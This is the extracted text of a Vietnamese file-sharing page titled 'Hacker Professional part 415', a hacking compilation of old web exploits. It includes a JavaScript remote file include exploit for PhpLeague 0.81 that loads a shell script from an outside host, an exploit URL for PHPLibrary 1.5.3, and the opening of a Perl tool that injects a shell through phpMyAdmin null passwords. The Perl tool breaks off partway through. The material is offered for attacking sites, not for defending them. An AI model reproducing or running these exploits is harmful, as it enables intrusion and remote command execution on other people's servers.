intTypePromotion=1
zunia.vn Tuyển sinh 2024 dành cho Gen-Z zunia.vn zunia.vn
ADSENSE

Hacker Professional part 415

Chia sẻ: Angel Smile | Ngày: | Loại File: PDF | Số trang:6

47
lượt xem
6
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Tham khảo tài liệu 'hacker professional part 415', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả

Chủ đề:
Lưu

Nội dung Text: Hacker Professional part 415

  1. //'[Coded by : ajann //'[Author : ajann //'[Contact : :( //'[Using : Write Target after Submit Click //'========================================================= ====================================== //Basic exploit,but any time : ( var adres="/config.php?" //FÝle name var acik ="cheminmini=" // Line 19 var shell="http://hometown.aol.com/yarivgiladi/musa.php?" // Shell Script function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+adres+acik+shell; // Ready Target : ) rfi.submit(); // Form Submit } PhpLeague 0.81 Remote File Include Exploit Target:
  2. face="Arial" size="1" color="#808080">[http://[target]/[scriptpath]   ajann # milw0rm.com [2006-10-25] Link lỗi : http://phpLeague.com/phpL/config.php?cheminmini=http://shellscript.php? micimacko(HCE) PHPLibrary-1.5.3(Description.php) Remote File Include Affected Software : PHPLibrary-1.5.3 Code: Exploit : http://victim.com/PHPLibrary-1.5.3/Description.php?cfg_dir= Black_hat_cr(HCE) PHPMyAdmin Null Password Sheel Injector.
  3. Code: #!/usr/bin/perl ################################################################## ############################################# # # # # Howto: Perl PMANull.pl # # Site Address: The ip or the Domain address of the target. # # Example: http://www.target.net # Example: 127.0.0.1 # # PMA Path: The PHPMyAdmin Script location. # Example: /phpmyadmin/ # Example: /admin/tools/pma/ # # Do: # [0] Do the entire hack from the shell injection until my command execution. # [1] Do the entire hack but without waiting for the commands. # [2] Go directly to the command execution script(Only works if you already Injected the script).
  4. # # To exit CMDS just write: anquit # ################################################################## ############################################ use IO::Socket; sub URLEncode { my $theURL = $_[0]; $theURL =~ s/([\W])/"%" . uc(sprintf("%2.2x",ord($1)))/eg; return $theURL; } sub httpcon ($$$$$) { my($sock ,$method, $ipaddr ,$location, $dataz) = @_; if($method eq "GET") { print $sock "GET $location HTTP/1.1\r\n"; print $sock "Host: $ipaddr\r\n"; print $sock 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7'."\r\n"; print $sock 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,i mage/png, */*;q=0.5'."\r\n"; print $sock 'Accept-Language: en-us,en;q=0.5'."\r\n";
  5. print $sock 'Accept-Charset: ISO-8859-1,utf- 8;q=0.7,*;q=0.7'."\r\n"; print $sock "Connection: Close\r\n\r\n"; } if($method eq "POST") { print $sock "POST $http HTTP/1.1\r\n"; print $sock "Host: $ip\r\n"; print $sock 'User-Agent: Mozilla/5.0 (Perl leetness)'."\r\n"; print $sock 'Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,i mage/png, */*;q=0.5'."\r\n"; print $sock 'Accept-Language: en-us,en;q=0.5'."\r\n"; print $sock 'Accept-Charset: ISO-8859-1,utf- 8;q=0.7,*;q=0.7'."\r\n"; print $sock "Connection: Close\r\n"; print $sock "Content-Type: application/x-www-form- urlencoded\r\n"; print $sock "Content-Length: ".length($dataz)."\r\n\r\n"; print $sock "$dataz"; } return 1; } if(@ARGV!=3){
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2